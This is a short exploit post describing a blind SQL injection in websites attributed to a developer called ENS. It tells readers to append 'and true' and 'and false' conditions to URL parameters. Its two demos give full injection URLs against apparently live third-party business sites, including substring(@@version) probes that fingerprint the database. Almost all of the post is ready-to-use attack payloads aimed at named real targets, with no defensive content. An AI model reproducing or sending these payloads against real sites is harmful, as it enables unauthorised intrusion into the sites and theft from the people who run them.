********************************************************* #Exploit Title: Designed & Developed by ENS - Blind Sql Injection #Date: 2024-01-03 #Exploit Author: Behrouz Mansoori #Vendor Homepage: https://www.ensconsultants.com #Category:webapps #Tested On: Mac, Firefox [+] First add "and true" and then "and false" to the end of the link : * Target.com/index.php?lang=1 true * Target.com/index.php?lang=1 false ### Demo 1: * https://www.travazatools.com/products1.php?product_cat_id=99%27%20and%20true--+ * https://www.travazatools.com/products1.php?product_cat_id=99%27%20and%20false--+ * https://www.travazatools.com/products1.php?product_cat_id=99%27%20and%20/*!12345substring(@@version,1,1)*/=5--+ ### Demo 2: * http://www.index-precast.com/projectmore.php?product_id=3%27%20and%20true--+ * http://www.index-precast.com/projectmore.php?product_id=3%27%20and%20false--+ * http://www.index-precast.com/projectmore.php?product_id=3%27%20and%20substring(@@version,1,1)=5--+ ********************************************************* #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: [email protected] *********************************************************